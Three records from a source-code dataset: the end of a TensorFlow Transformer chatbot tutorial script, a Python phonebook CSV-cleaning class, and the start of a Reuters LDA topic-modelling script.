dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n#print(dataset)\n\n\"\"\"## Attention\n\n### Scaled dot product Attention\n\nThe scaled dot-product attention function used by the transformer takes three inputs: Q (query), K (key), V (value). The equation used to calculate the attention weights is:\n\n$$\\Large{Attention(Q, K, V) = softmax_k(\\frac{QK^T}{\\sqrt{d_k}}) V} $$\n\nAs the softmax normalization is done on the `key`, its values decide the amount of importance given to the `query`.\n\nThe output represents the multiplication of the attention weights and the `value` vector. This ensures that the words we want to focus on are kept as is and the irrelevant words are flushed out.\n\nThe dot-product attention is scaled by a factor of square root of the depth. This is done because for large values of depth, the dot product grows large in magnitude pushing the softmax function where it has small gradients resulting in a very hard softmax. \n\nFor example, consider that `query` and `key` have a mean of 0 and variance of 1. Their matrix multiplication will have a mean of 0 and variance of `dk`. Hence, *square root of `dk`* is used for scaling (and not any other number) because the matmul of `query` and `key` should have a mean of 0 and variance of 1, so that we get a gentler softmax.\n\nThe mask is multiplied with *-1e9 (close to negative infinity).* This is done because the mask is summed with the scaled matrix multiplication of `query` and `key` and is applied immediately before a softmax. The goal is to zero out these cells, and large negative inputs to softmax are near zero in the output.\n\"\"\"\n\ndef scaled_dot_product_attention(query, key, value, mask):\n \"\"\"Calculate the attention weights. \"\"\"\n matmul_qk = tf.matmul(query, key, transpose_b=True)\n\n # scale matmul_qk\n depth = tf.cast(tf.shape(key)[-1], tf.float32)\n logits = matmul_qk / tf.math.sqrt(depth)\n\n # add the mask to zero out padding tokens\n if mask is not None:\n logits += (mask * -1e9)\n\n # softmax is normalized on the last axis (seq_len_k)\n attention_weights = tf.nn.softmax(logits, axis=-1)\n\n output = tf.matmul(attention_weights, value)\n\n return output\n\n\"\"\"### Multi-head attention\n\n\"multi-head\n\n\nMulti-head attention consists of four parts:\n* Linear layers and split into heads.\n* Scaled dot-product attention.\n* Concatenation of heads.\n* Final linear layer.\n\nEach multi-head attention block gets three inputs; Q (query), K (key), V (value). These are put through linear (Dense) layers and split up into multiple heads. \n\nThe `scaled_dot_product_attention` defined above is applied to each head (broadcasted for efficiency). An appropriate mask must be used in the attention step. The attention output for each head is then concatenated (using `tf.transpose`, and `tf.reshape`) and put through a final `Dense` layer.\n\nInstead of one single attention head, `query`, `key`, and `value` are split into multiple heads because it allows the model to jointly attend to information at different positions from different representational spaces. After the split each head has a reduced dimensionality, so the total computation cost is the same as a single head attention with full dimensionality.\n\"\"\"\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n\n def __init__(self, d_model, num_heads, name=\"multi_head_attention\"):\n super(MultiHeadAttention, self).__init__(name=name)\n self.num_heads = num_heads\n self.d_model = d_model\n\n assert d_model % self.num_heads == 0\n\n self.depth = d_model // self.num_heads\n\n self.query_dense = tf.keras.layers.Dense(units=d_model)\n self.key_dense = tf.keras.layers.Dense(units=d_model)\n self.value_dense = tf.keras.layers.Dense(units=d_model)\n\n self.dense = tf.keras.layers.Dense(units=d_model)\n\n def split_heads(self, inputs, batch_size):\n inputs = tf.reshape(\n inputs, shape=(batch_size, -1, self.num_heads, self.depth))\n return tf.transpose(inputs, perm=[0, 2, 1, 3])\n\n def call(self, inputs):\n query, key, value, mask = inputs['query'], inputs['key'], inputs[\n 'value'], inputs['mask']\n batch_size = tf.shape(query)[0]\n\n # linear layers\n query = self.query_dense(query)\n key = self.key_dense(key)\n value = self.value_dense(value)\n\n # split heads\n query = self.split_heads(query, batch_size)\n key = self.split_heads(key, batch_size)\n value = self.split_heads(value, batch_size)\n\n # scaled dot-product attention\n scaled_attention = scaled_dot_product_attention(query, key, value, mask)\n\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\n\n # concatenation of heads\n concat_attention = tf.reshape(scaled_attention,\n (batch_size, -1, self.d_model))\n\n # final linear layer\n outputs = self.dense(concat_attention)\n\n return outputs\n\n\"\"\"## Transformer\n\n### Masking\n\n`create_padding_mask` and `create_look_ahead` are helper functions to creating masks to mask out padded tokens, we are going to use these helper functions as `tf.keras.layers.Lambda` layers.\n\nMask all the pad tokens (value `0`) in the batch to ensure the model does not treat padding as input.\n\"\"\"\n\ndef create_padding_mask(x):\n mask = tf.cast(tf.math.equal(x, 0), tf.float32)\n # (batch_size, 1, 1, sequence length)\n return mask[:, tf.newaxis, tf.newaxis, :]\n\n#print(create_padding_mask(tf.constant([[1, 2, 0, 3, 0], [0, 0, 0, 4, 5]])))\n\n\"\"\"Look-ahead mask to mask the future tokens in a sequence.\nWe also mask out pad tokens.\n\ni.e. To predict the third word, only the first and second word will be used\n\"\"\"\n\ndef create_look_ahead_mask(x):\n seq_len = tf.shape(x)[1]\n look_ahead_mask = 1 - tf.linalg.band_part(tf.ones((seq_len, seq_len)), -1, 0)\n padding_mask = create_padding_mask(x)\n return tf.maximum(look_ahead_mask, padding_mask)\n\n#print(create_look_ahead_mask(tf.constant([[1, 2, 0, 4, 5]])))\n\n\"\"\"### Positional encoding\n\nSince this model doesn't contain any recurrence or convolution, positional encoding is added to give the model some information about the relative position of the words in the sentence. \n\nThe positional encoding vector is added to the embedding vector. Embeddings represent a token in a d-dimensional space where tokens with similar meaning will be closer to each other. But the embeddings do not encode the relative position of words in a sentence. So after adding the positional encoding, words will be closer to each other based on the *similarity of their meaning and their position in the sentence*, in the d-dimensional space.\n\nSee the notebook on [positional encoding](https://github.com/tensorflow/examples/blob/master/community/en/position_encoding.ipynb) to learn more about it. The formula for calculating the positional encoding is as follows:\n\n$$\\Large{PE_{(pos, 2i)} = sin(pos / 10000^{2i / d_{model}})} $$\n$$\\Large{PE_{(pos, 2i+1)} = cos(pos / 10000^{2i / d_{model}})} $$\n\"\"\"\n\nclass PositionalEncoding(tf.keras.layers.Layer):\n\n def __init__(self, position, d_model):\n super(PositionalEncoding, self).__init__()\n self.pos_encoding = self.positional_encoding(position, d_model)\n\n def get_angles(self, position, i, d_model):\n angles = 1 / tf.pow(10000, (2 * (i // 2)) / tf.cast(d_model, tf.float32))\n return position * angles\n\n def positional_encoding(self, position, d_model):\n angle_rads = self.get_angles(\n position=tf.range(position, dtype=tf.float32)[:, tf.newaxis],\n i=tf.range(d_model, dtype=tf.float32)[tf.newaxis, :],\n d_model=d_model)\n # apply sin to even index in the array\n sines = tf.math.sin(angle_rads[:, 0::2])\n # apply cos to odd index in the array\n cosines = tf.math.cos(angle_rads[:, 1::2])\n\n pos_encoding = tf.concat([sines, cosines], axis=-1)\n pos_encoding = pos_encoding[tf.newaxis, ...]\n return tf.cast(pos_encoding, tf.float32)\n\n def call(self, inputs):\n return inputs + self.pos_encoding[:, :tf.shape(inputs)[1], :]\n\n\"\"\"### Encoder Layer\n\nEach encoder layer consists of sublayers:\n\n1. Multi-head attention (with padding mask) \n2. 2 dense layers followed by dropout\n\nEach of these sublayers has a residual connection around it followed by a layer normalization. Residual connections help in avoiding the vanishing gradient problem in deep networks.\n\nThe output of each sublayer is `LayerNorm(x + Sublayer(x))`. The normalization is done on the `d_model` (last) axis.\n\"\"\"\n\ndef encoder_layer(units, d_model, num_heads, dropout, name=\"encoder_layer\"):\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\n\n attention = MultiHeadAttention(\n d_model, num_heads, name=\"attention\")({\n 'query': inputs,\n 'key': inputs,\n 'value': inputs,\n 'mask': padding_mask\n })\n attention = tf.keras.layers.Dropout(rate=dropout)(attention)\n attention = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(inputs + attention)\n\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention)\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\n outputs = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(attention + outputs)\n\n return tf.keras.Model(\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\n\n\"\"\"### Encoder\n\nThe Encoder consists of:\n1. Input Embedding\n2. Positional Encoding\n3. `num_layers` encoder layers\n\nThe input is put through an embedding which is summed with the positional encoding. The output of this summation is the input to the encoder layers. The output of the encoder is the input to the decoder.\n\"\"\"\n\ndef encoder(vocab_size,\n num_layers,\n units,\n d_model,\n num_heads,\n dropout,\n name=\"encoder\"):\n inputs = tf.keras.Input(shape=(None,), name=\"inputs\")\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\n\n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\n\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\n\n for i in range(num_layers):\n outputs = encoder_layer(\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n name=\"encoder_layer_{}\".format(i),\n )([outputs, padding_mask])\n\n return tf.keras.Model(\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\n\n\"\"\"### Decoder Layer\n\nEach decoder layer consists of sublayers:\n\n1. Masked multi-head attention (with look ahead mask and padding mask)\n2. Multi-head attention (with padding mask). `value` and `key` receive the *encoder output* as inputs. `query` receives the *output from the masked multi-head attention sublayer.*\n3. 2 dense layers followed by dropout\n\nEach of these sublayers has a residual connection around it followed by a layer normalization. The output of each sublayer is `LayerNorm(x + Sublayer(x))`. The normalization is done on the `d_model` (last) axis.\n\nAs `query` receives the output from decoder's first attention block, and `key` receives the encoder output, the attention weights represent the importance given to the decoder's input based on the encoder's output. In other words, the decoder predicts the next word by looking at the encoder output and self-attending to its own output. See the demonstration above in the scaled dot product attention section.\n\"\"\"\n\ndef decoder_layer(units, d_model, num_heads, dropout, name=\"decoder_layer\"):\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\n enc_outputs = tf.keras.Input(shape=(None, d_model), name=\"encoder_outputs\")\n look_ahead_mask = tf.keras.Input(\n shape=(1, None, None), name=\"look_ahead_mask\")\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\n\n attention1 = MultiHeadAttention(\n d_model, num_heads, name=\"attention_1\")(inputs={\n 'query': inputs,\n 'key': inputs,\n 'value': inputs,\n 'mask': look_ahead_mask\n })\n attention1 = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(attention1 + inputs)\n\n attention2 = MultiHeadAttention(\n d_model, num_heads, name=\"attention_2\")(inputs={\n 'query': attention1,\n 'key': enc_outputs,\n 'value': enc_outputs,\n 'mask': padding_mask\n })\n attention2 = tf.keras.layers.Dropout(rate=dropout)(attention2)\n attention2 = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(attention2 + attention1)\n\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention2)\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\n outputs = tf.keras.layers.LayerNormalization(\n epsilon=1e-6)(outputs + attention2)\n\n return tf.keras.Model(\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\n outputs=outputs,\n name=name)\n\n\"\"\"### Decoder\n\nThe Decoder consists of:\n1. Output Embedding\n2. Positional Encoding\n3. N decoder layers\n\nThe target is put through an embedding which is summed with the positional encoding. The output of this summation is the input to the decoder layers. The output of the decoder is the input to the final linear layer.\n\"\"\"\n\ndef decoder(vocab_size,\n num_layers,\n units,\n d_model,\n num_heads,\n dropout,\n name='decoder'):\n inputs = tf.keras.Input(shape=(None,), name='inputs')\n enc_outputs = tf.keras.Input(shape=(None, d_model), name='encoder_outputs')\n look_ahead_mask = tf.keras.Input(\n shape=(1, None, None), name='look_ahead_mask')\n padding_mask = tf.keras.Input(shape=(1, 1, None), name='padding_mask')\n \n embeddings = tf.keras.layers.Embedding(vocab_size, d_model)(inputs)\n embeddings *= tf.math.sqrt(tf.cast(d_model, tf.float32))\n embeddings = PositionalEncoding(vocab_size, d_model)(embeddings)\n\n outputs = tf.keras.layers.Dropout(rate=dropout)(embeddings)\n\n for i in range(num_layers):\n outputs = decoder_layer(\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n name='decoder_layer_{}'.format(i),\n )(inputs=[outputs, enc_outputs, look_ahead_mask, padding_mask])\n\n return tf.keras.Model(\n inputs=[inputs, enc_outputs, look_ahead_mask, padding_mask],\n outputs=outputs,\n name=name)\n\n\"\"\"### Transformer\n\nTransformer consists of the encoder, decoder and a final linear layer. The output of the decoder is the input to the linear layer and its output is returned.\n\"\"\"\n\ndef transformer(vocab_size,\n num_layers,\n units,\n d_model,\n num_heads,\n dropout,\n name=\"transformer\"):\n inputs = tf.keras.Input(shape=(None,), name=\"inputs\")\n dec_inputs = tf.keras.Input(shape=(None,), name=\"dec_inputs\")\n\n enc_padding_mask = tf.keras.layers.Lambda(\n create_padding_mask, output_shape=(1, 1, None),\n name='enc_padding_mask')(inputs)\n # mask the future tokens for decoder inputs at the 1st attention block\n look_ahead_mask = tf.keras.layers.Lambda(\n create_look_ahead_mask,\n output_shape=(1, None, None),\n name='look_ahead_mask')(dec_inputs)\n # mask the encoder outputs for the 2nd attention block\n dec_padding_mask = tf.keras.layers.Lambda(\n create_padding_mask, output_shape=(1, 1, None),\n name='dec_padding_mask')(inputs)\n\n enc_outputs = encoder(\n vocab_size=vocab_size,\n num_layers=num_layers,\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n )(inputs=[inputs, enc_padding_mask])\n\n dec_outputs = decoder(\n vocab_size=vocab_size,\n num_layers=num_layers,\n units=units,\n d_model=d_model,\n num_heads=num_heads,\n dropout=dropout,\n )(inputs=[dec_inputs, enc_outputs, look_ahead_mask, dec_padding_mask])\n\n outputs = tf.keras.layers.Dense(units=vocab_size, name=\"outputs\")(dec_outputs)\n\n return tf.keras.Model(inputs=[inputs, dec_inputs], outputs=outputs, name=name)\n\n\"\"\"## Train model\n\n### Initialize model\n\nTo keep this example small and relatively fast, the values for *num_layers, d_model, and units* have been reduced. See the [paper](https://arxiv.org/abs/1706.03762) for all the other versions of the transformer.\n\"\"\"\n\nprint(\"Initializing and compiling model.\")\n\ntf.keras.backend.clear_session()\n\n# Hyper-parameters\nNUM_LAYERS = 4\nD_MODEL = 512\nNUM_HEADS = 8\nUNITS = 2048\nDROPOUT = 0.1\n\nmodel = transformer(\n vocab_size=VOCAB_SIZE,\n num_layers=NUM_LAYERS,\n units=UNITS,\n d_model=D_MODEL,\n num_heads=NUM_HEADS,\n dropout=DROPOUT)\n\n\"\"\"### Loss function\n\nSince the target sequences are padded, it is important to apply a padding mask when calculating the loss.\n\"\"\"\n\ndef loss_function(y_true, y_pred):\n y_true = tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\n \n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')(y_true, y_pred)\n\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n loss = tf.multiply(loss, mask)\n\n return tf.reduce_mean(loss)\n\n\"\"\"### Custom learning rate\n\nUse the Adam optimizer with a custom learning rate scheduler according to the formula in the [paper](https://arxiv.org/abs/1706.03762).\n\n$$\\Large{lrate = d_{model}^{-0.5} * min(step{\\_}num^{-0.5}, step{\\_}num * warmup{\\_}steps^{-1.5})}$$\n\"\"\"\n\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\n\n def __init__(self, d_model, warmup_steps=4000):\n super(CustomSchedule, self).__init__()\n\n self.d_model = d_model\n self.d_model = tf.cast(self.d_model, tf.float32)\n\n self.warmup_steps = warmup_steps\n\n def __call__(self, step):\n arg1 = tf.math.rsqrt(step)\n arg2 = step * (self.warmup_steps**-1.5)\n\n return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)\n\n\"\"\"### Compile Model\"\"\"\n\nlearning_rate = CustomSchedule(D_MODEL)\n\noptimizer = tf.keras.optimizers.Adam(\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n\ndef accuracy(y_true, y_pred):\n # ensure labels have shape (batch_size, MAX_LENGTH - 1)\n y_true = tf.reshape(y_true, shape=(-1, MAX_LENGTH - 1))\n return tf.keras.metrics.sparse_categorical_accuracy(y_true, y_pred)\n\nmodel.compile(optimizer=optimizer, loss=loss_function, metrics=[accuracy])\n\nprint(\"Model compiled. Starting training.\")\n\n\"\"\"### Fit model\n\nTrain our transformer by simply calling `model.fit()`\n\"\"\"\n\ncheckpoint_path = \"training/\"+data_name+\"_cp.ckpt\"\ncheckpoint_dir = os.path.dirname(checkpoint_path)\n\n# Create a callback that saves the model's weights\ncp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,\n save_weights_only=True,\n verbose=1)\n\n# Create an early stopping callback\nearlystop_callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n patience=3)\n\n# Split dataset to get validation\nval_dataset = dataset.take(VALIDATION_SIZE)\ntrain_dataset = dataset.skip(VALIDATION_SIZE)\n\nif new_training:\n model.fit(train_dataset, epochs=EPOCHS, validation_data=val_dataset, callbacks=[cp_callback, earlystop_callback])\nelse:\n model.load_weights(checkpoint_path)\n\n\"\"\"## Evaluate and predict\n\nThe following steps are used for evaluation:\n\n* Apply the same preprocessing method we used to create our dataset for the input sentence.\n* Tokenize the input sentence and add `START_TOKEN` and `END_TOKEN`. \n* Calculate the padding masks and the look ahead masks.\n* The decoder then outputs the predictions by looking at the encoder output and its own output.\n* Select the last word and calculate the argmax of that.\n* Concatentate the predicted word to the decoder input as pass it to the decoder.\n* In this approach, the decoder predicts the next word based on the previous words it predicted.\n\nNote: The model used here has less capacity and trained on a subset of the full dataset, hence its performance can be further improved.\n\"\"\"\n\ndef evaluate(sentence):\n sentence = preprocess_sentence(sentence)\n\n sentence = tf.expand_dims(\n START_TOKEN + tokenizer.encode(sentence) + END_TOKEN, axis=0)\n\n output = tf.expand_dims(START_TOKEN, 0)\n\n for i in range(MAX_LENGTH):\n predictions = model(inputs=[sentence, output], training=False)\n\n # select the last word from the seq_len dimension\n predictions = predictions[:, -1:, :]\n predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)\n\n # return the result if the predicted_id is equal to the end token\n if tf.equal(predicted_id, END_TOKEN[0]):\n break\n\n # concatenated the predicted_id to the output which is given to the decoder\n # as its input.\n output = tf.concat([output, predicted_id], axis=-1)\n\n return tf.squeeze(output, axis=0)\n\n\ndef predict(sentence):\n prediction = evaluate(sentence)\n\n predicted_sentence = tokenizer.decode(\n [i for i in prediction if i < tokenizer.vocab_size])\\\n\n return predicted_sentence\n\n\"\"\"Run model!\"\"\"\n\nprint(\"Model trained. Ready to run! Verfication code: Zh1Alex9dU\")\n\ndef main():\n inp = input()\n out = predict(inp)\n print( out )\n main()\n\nmain()\n\n\"\"\"## Summary\n\nHere we are, we have implemented a Transformer in TensorFlow 2.0 in around 500 lines of code.\n\nIn this tutorial, we focus on the two different approaches to implement complex models with Functional API and Model subclassing, and how to incorporate them.\n\nTry using a different dataset or hyper-parameters to train the Transformer! Thanks for reading.\n\"\"\"","repo_name":"Hailiax/GT-fakeTrumpAI-Twitter-Bot","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":28992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23639005178","text":"import csv\nimport re\n\nPHONE_SEARCH_PATTERN = r'(\\+7|8)*[\\s\\(]*(\\d{3})[\\)\\s-]*(\\d{3})[-]*(\\d{2})[-]*(\\d{2})[\\s\\(]*(доб\\.)*[\\s]*(\\d+)*[\\)]*'\nPHONE_SUB_PATTERN = r'+7(\\2)-\\3-\\4-\\5 \\6\\7'\n\nclass PhoneBook:\n def __init__(self, raw_data_path):\n raw_contact_list = self._get_raw(raw_data_path)\n contact_list_with_doubles = self._process_raw_data(raw_contact_list)\n self.pure_contact_list = self._make_pure_contact_list(contact_list_with_doubles)\n\n @staticmethod\n def _get_raw(data):\n with open(data, encoding='utf-8') as file:\n rows = csv.reader(file, delimiter=\",\")\n result = list(rows)\n return result\n\n @staticmethod\n def _process_raw_data(data):\n result = list()\n for row in data:\n record = list()\n full_name = re.findall(r'(\\w+)', ' '.join(row[:3]))\n full_name.append('') if len(full_name) < 3 else ...\n record += full_name\n record.append(row[3])\n record.append(row[4])\n record.append(re.sub(PHONE_SEARCH_PATTERN, PHONE_SUB_PATTERN, row[5]).strip())\n record.append(row[6])\n result.append(record)\n return result\n\n def _make_pure_contact_list(self, data):\n result = dict()\n for item in data:\n result[item[0]] = self._merge_doubles(item, result[item[0]]) if item[0] in result else item\n return result.values()\n\n @staticmethod\n def _merge_doubles(record_one, record_two):\n result = list()\n for index in range(len(record_one)):\n result.append(record_one[index]) if record_one[index] else result.append(record_two[index])\n return result\n\n def fix(self, pure_data_path):\n with open(pure_data_path, \"w\", encoding='utf-8', newline='') as file:\n writer = csv.writer(file, delimiter=',')\n writer.writerows(self.pure_contact_list)\n print('Phonebook fixed, data saved in application/data/phonebook_pure.csv')\n","repo_name":"alfa-netology/advanced-py-hw-05-oop","sub_path":"application/cls_phonebook.py","file_name":"cls_phonebook.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34627480330","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom nltk.corpus import reuters, stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.multiclass import OneVsRestClassifier, OneVsOneClassifier\r\nfrom sklearn import svm\r\nfrom sklearn.preprocessing import MultiLabelBinarizer, LabelEncoder\r\nfrom scipy.special import digamma\r\nimport numpy as np\r\nimport lda\r\nfrom reuters_utils import softmax, log_gamma, log_sum, trigamma, opt_alpha\r\nimport time\r\nfrom matplotlib import pyplot as plt\r\n#reuters.fileids()[-10:]\r\n#len(reuters.categories())\r\n#reuters.categories('training/9989')\r\n#print(*reuters.words(idlist[-1]), sep = '\\n')\r\n \r\n\r\nclass LDA_Model:\r\n def __init__(self, num_topics, num_terms, alpha=1.0):\r\n self.num_topics = num_topics\r\n self.num_terms = num_terms\r\n self.alpha = alpha\r\n self.log_prob_w = np.random.random([num_topics, num_terms]) + 1/num_terms\r\n \r\n\r\nclass Document:\r\n def __init__(self,doc_id, words_id, K,label = None):\r\n # words_id: a list of positions of words in vocabulary\r\n self.words = words_id\r\n self.length = len(words_id)\r\n self.terms, self.term_counts = np.unique(words_id, return_counts = True)\r\n self.num_terms = len(self.terms)\r\n self.doc_id = doc_id\r\n self.label = label\r\n self.gamma = np.zeros(K)\r\n self.phi = np.zeros([self.num_terms,K])\r\n\r\nclass LDA_Suffstats:\r\n def __init__(self,model):\r\n self.class_total = np.zeros(model.num_topics)\r\n self.class_term = np.zeros([model.num_topics, model.num_terms])\r\n self.num_docs = 0\r\n self.alpha_suffstats = 0\r\n\r\n\r\ndef compute_likelihood(doc, model, phi, gamma):\r\n likelihood = 0\r\n dig = digamma(gamma)\r\n gamma_sum = np.sum(gamma)\r\n digsum = digamma(gamma_sum)\r\n likelihood = (likelihood + log_gamma(model.alpha * model.num_topics) \r\n - model.num_topics * log_gamma(model.alpha)\r\n - log_gamma(gamma_sum))\r\n \r\n likelihood = (likelihood + model.alpha * np.sum(dig - digsum)\r\n - np.sum((gamma - 1) * (dig - digsum)))\r\n\r\n for k in range(model.num_topics):\r\n likelihood += log_gamma(gamma[k])\r\n\r\n for n in range(doc.num_terms):\r\n for k in range(model.num_topics):\r\n if phi[n,k] > 0:\r\n likelihood = (likelihood + doc.term_counts[n] * (phi[n,k] * ((dig[k] - digsum) - np.log(phi[n,k]) + model.log_prob_w[k,doc.terms[n]])))\r\n \r\n return likelihood\r\n\r\n\r\ndef variational_inference(doc, model, max_iter, converge_thresh = 1e-6 ):\r\n '''\r\n doc: the dth document\r\n gamma: 1 x K (number_of_topics)\r\n digamma_gamma: 1 x K\r\n phi: N_d(number of terms in dth document) x K\r\n '''\r\n gamma = doc.gamma\r\n phi = doc.phi\r\n converged = 1\r\n phisum = 0\r\n likelihood = 0\r\n likelihood_old = 0\r\n oldphi = np.zeros([model.num_topics])\r\n digamma_gamma = np.zeros([model.num_topics])\r\n \r\n # initialization of gamma and phi\r\n gamma = np.ones(model.num_topics) * (model.alpha + doc.length / model.num_topics)\r\n digamma_gamma = digamma(gamma)\r\n phi = np.ones([doc.num_terms,model.num_topics]) / model.num_topics\r\n #print('digamma:{}'.format(digamma_gamma))\r\n # inference loop\r\n i_iter = 0\r\n while (converged > converge_thresh) and (i_iter < max_iter or max_iter == -1):\r\n i_iter = i_iter + 1\r\n for n in range(doc.num_terms):\r\n phisum = 0\r\n for k in range(model.num_topics): \r\n oldphi[k] = phi[n,k]\r\n phi[n,k] = digamma_gamma[k] + model.log_prob_w[k, doc.terms[n]]\r\n\r\n if k > 0:\r\n phisum = log_sum(phisum, phi[n,k])\r\n else:\r\n phisum = phi[n, k]\r\n \r\n #End For\r\n \r\n phi[n,:] = np.exp(phi[n,:] - phisum)\r\n gamma = gamma + doc.term_counts[n] * (phi[n,:] - oldphi)\r\n digamma_gamma = digamma(gamma)\r\n\r\n #End For\r\n likelihood = compute_likelihood(doc, model, phi, gamma)\r\n if i_iter > 1:\r\n converged = (likelihood_old - likelihood) / likelihood_old\r\n likelihood_old = likelihood\r\n \r\n #End while\r\n #print(\"[Variational Inference Summary] Iteration: {0} Likelihood: {1:.0f} Coverged: {2:.8f}\".format(i_iter, likelihood, converged), file=text_file)\r\n \r\n doc.gamma = gamma\r\n doc.phi = phi\r\n return likelihood # Check: scope of gamma and phi\r\n\r\n\r\ndef doc_e_step(doc, model, ss, VAR_MAX_ITER):\r\n \r\n likelihood = variational_inference(doc, model, max_iter = VAR_MAX_ITER);\r\n\r\n # update sufficient statistics\r\n\r\n gamma_sum = np.sum(doc.gamma)\r\n ss.alpha_suffstats = (ss.alpha_suffstats + np.sum(digamma(doc.gamma))\r\n - model.num_topics * digamma(gamma_sum))\r\n\r\n for n in range(doc.num_terms):\r\n for k in range(model.num_topics):\r\n ss.class_term[k,doc.terms[n]] = ss.class_term[k,doc.terms[n]]+ doc.term_counts[n]*doc.phi[n,k]\r\n ss.class_total[k] = ss.class_total[k] + doc.term_counts[n]*doc.phi[n,k]\r\n \r\n ss.num_docs = ss.num_docs + 1\r\n \r\n return likelihood\r\n\r\n\r\n\r\ndef lda_mle(model, ss, estimate_alpha):\r\n for k in range(model.num_topics):\r\n for w in range( model.num_terms):\r\n if (ss.class_term[k,w] > 0):\r\n model.log_prob_w[k,w] =np.log(ss.class_term[k,w]) - np.log(ss.class_total[k])\r\n else:\r\n model.log_prob_w[k,w] = -100\r\n\r\n if estimate_alpha:\r\n model.alpha = opt_alpha(ss.alpha_suffstats,ss.num_docs, model.num_topics)\r\n print(\"new alpha = {0:.3}\\n\".format(model.alpha))\r\n\r\n\r\n\r\ndef EM(docs, model, EM_CONVERGED = 1e-4, EM_MAX_ITER = 2000):\r\n i = 0\r\n likelihood_old = 0\r\n converged = 1\r\n VAR_MAX_ITER = 20\r\n while (((converged < 0) or (converged > EM_CONVERGED) or (i <= 2)) and (i <= EM_MAX_ITER)):\r\n i = i + 1\r\n print(\"****** EM iteration {} ****** timestamp:{:.0f}\".format(i, time.time()))\r\n likelihood = 0\r\n ss = LDA_Suffstats(model)\r\n\r\n # e-step\r\n\r\n for doc in docs:\r\n likelihood = likelihood + doc_e_step(doc, model, ss, VAR_MAX_ITER)\r\n\r\n # m-step\r\n lda_mle(model,ss, estimate_alpha = True)\r\n \r\n # check for convergence\r\n if i >1:\r\n converged = (likelihood_old - likelihood) / likelihood_old\r\n if (converged < 0): VAR_MAX_ITER = VAR_MAX_ITER * 2 \r\n \r\n likelihood_old = likelihood\r\n\r\ndef infer( test_labels, test_corpus):\r\n test_doc_term_mat = vectorizer.transform(test_corpus)\r\n WS, DS = lda.utils.matrix_to_lists(test_doc_term_mat)\r\n t_docs = []\r\n for d in range(len(test_corpus)):\r\n t_docs.append(Document(doc_id = test_idlist[d], K = model.num_topics, words_id = WS[DS==d], \r\n label = reuters.categories(test_idlist[d])))\r\n for doc in t_docs: \r\n variational_inference(doc, model, 20)\r\n return t_docs, test_doc_term_mat\r\n \r\n# def main():\r\n \r\n\r\nif __name__ == '__main__':\r\n \r\n text_file = open(\"Output.txt\", \"w\")\r\n\r\n number_of_docs = 10788\r\n #num_train_docs = int(number_of_docs*0.8)\r\n num_train_docs = int(10788-3019)\r\n\r\n np.random.seed(6)\r\n \r\n# idlist = list(np.random.choice(reuters.fileids(), number_of_docs))\r\n# train_idlist = idlist[:num_train_docs]\r\n# test_idlist = idlist[num_train_docs:]\r\n\r\n idlist = reuters.fileids()\r\n train_idlist = idlist[3019:]\r\n test_idlist = idlist[:3019]\r\n\r\n stop_words = set(stopwords.words('english'))\r\n p_stemmer = PorterStemmer()\r\n \r\n def read_document(idlist, stop_words=stop_words, stemmer=p_stemmer, V=None):\r\n labels = []\r\n corpus = []\r\n for id in idlist:\r\n labels.append(reuters.categories(id))\r\n stopped_tokens = [word.lower() for word in reuters.words(id) if word.isalpha() and (word.lower() not in stop_words)]\r\n reuters.words(id).close()\r\n stemmed_tokens = [p_stemmer.stem(token) for token in stopped_tokens] \r\n if V:\r\n stemmed_tokens = [token for token in stemmed_tokens if token in V]\r\n corpus.append(' '.join(stemmed_tokens))\r\n return labels, corpus\r\n \r\n labels, corpus = read_document(train_idlist)\r\n labelsets = list(set(sum(labels,[]))) # concatnate the lists in labels and keep the uniques\r\n number_of_topics = 10 #len(labelsets)\r\n \r\n vectorizer = CountVectorizer(lowercase = False)\r\n doc_term_mat = 